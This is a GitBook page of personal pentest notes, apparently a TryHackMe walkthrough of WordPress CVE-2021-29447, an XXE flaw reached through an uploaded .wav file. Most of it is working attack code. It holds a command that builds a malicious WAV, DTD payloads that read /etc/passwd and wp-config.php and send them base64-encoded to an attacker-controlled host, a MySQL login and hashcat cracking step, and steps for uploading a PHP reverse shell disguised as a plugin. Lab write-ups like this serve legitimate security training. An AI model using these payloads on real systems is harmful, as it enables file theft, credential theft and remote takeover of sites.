Notes
  • šŸ‘€About me
  • ā„¹ļøGood Reads
  • šŸŒWeb
    • Web Pentesting Checklist
    • Insecure Deserialization
    • Blind XPath Injection
    • GraphQL
    • Reverse Shells
      • IIS
    • Content-Security-Policy
      • XSS (Static Nonce in CSP)
    • LLM (Large Language Models)
  • šŸ“˜Windows API
    • C# - P/Invoke
  • ā˜•Miscellaneous Topics
    • Phishing with Gophish
    • Pentest Diaries
      • SQL Queries via Grafana
      • LDAP Pass Back Attack
      • Misconfigured File Upload to RCE
  • šŸ§ƒHack The Box
    • Intelligence
    • Seal
    • Under Construction
    • Previse
    • Return
    • Sauna
    • Nest
  • šŸ“•TryHackMe
    • Wordpress CVE-2021-29447
    • Attacktiv
    • Fortress
    • internal
  • šŸ› ļøCheatsheet
    • Anti-Forensic Techniques
    • JSON - jq
    • Docker
    • Hidden Secrets
    • Database Exploitation
      • PostgreSQL
        • Blind SQLi script
      • SQL Server
    • C Sharp
    • Reversing
      • Windows
    • SSH
    • Python
      • Miscellaneous Scripts
        • Credential Bruteforcing a CLI service
    • Privilege Escalation
      • Windows
    • socat
    • OSINT
      • Shodan
    • Installation
Powered by GitBook
On this page

Was this helpful?

  1. TryHackMe

Wordpress CVE-2021-29447

wordpress running in php 8, upload .wav file patched in wp 5.7.1

php://filter/zlib.inflate/resource=test.deflated

ā€¢ .wav file echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.17.14.169:8000/evil.dtd'"'"'>%remote;]>\x00' > payload.wav ā€¢ evil.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.17.14.169:8000/?a=%file;'>"> %eval; %exfiltrate; OR <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php"> <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.17.14.169:8000/?a=%file;'>"> %eval; %exfiltrate; ā€¢ decode zlib <?php echo zlib_decode(base64_decode('...')); ?> thedarktangent:[redacted] mysql -h 10.10.96.36 -P 3306 -u thedarktangent -p[redacted] hashcat.bin -m 400 -a0 user.hash rockyou.txt - wp users corp-001:[redacted] test-corp:[redacted] ā€¢ creating vulnerable wordpress plugin in zip format 1. 2 files required - php-reverse-shell and plugin info [both php files] 2. zip and upload them [zip wp file1 file2] 3. Access php-reverse-shell on URL - <IP>/wp-content/plugins/wp/php-reverse-shell.php

PreviousNestNextAttacktiv

Last updated 3 years ago

Was this helpful?

šŸ“•